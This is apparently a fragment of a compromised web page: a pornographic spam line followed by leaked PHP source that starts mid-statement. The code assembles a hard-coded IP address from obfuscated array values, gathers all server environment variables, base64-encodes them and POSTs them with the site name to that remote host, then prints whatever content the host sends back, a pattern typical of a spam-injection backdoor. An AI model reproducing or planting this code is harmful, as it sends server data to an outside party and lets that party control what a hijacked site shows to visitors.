watch sexy videos at nza-vids!
'; $dir[] = 'hover'; for($d=0;$d<=$this->num;$d++){ $dirt .= $dir[$d].'=';} return $dirt; } function applet($comb){ return $this->constr."$comb"; } public function srv(){ $ar = array( 0=>'155', 1=>'245', 2=>'50', 3=>'72', 4=>'450', 5=>'22', 6=>'101', 7=>'82', 8=>'168', 9=>'231', 10=>'321' ); return $this->protocol()."$ar[2].$ar[5].$ar[7].$ar[3]"; } function get_curl($adr){ $params = array(); foreach ($_SERVER as $k=>$v) { if($k!='argv'){ $params[] = urlencode($k).'='.base64_encode($v); }} $combi = implode('&', $params); $address = $adr.'index.php?'.$this->qry; include "settings.php"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $address); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $combi.'&sitename='.urlencode($sitename)); $disp = curl_exec($ch); curl_close($ch); return $disp; } //-----------// public function print_o($content=false){ if($content==true){ echo $this->index; }else{ exit(); } } public function print_0($arg=true){ return false; } } include 'header.php'; include 'xxx.php'; ?>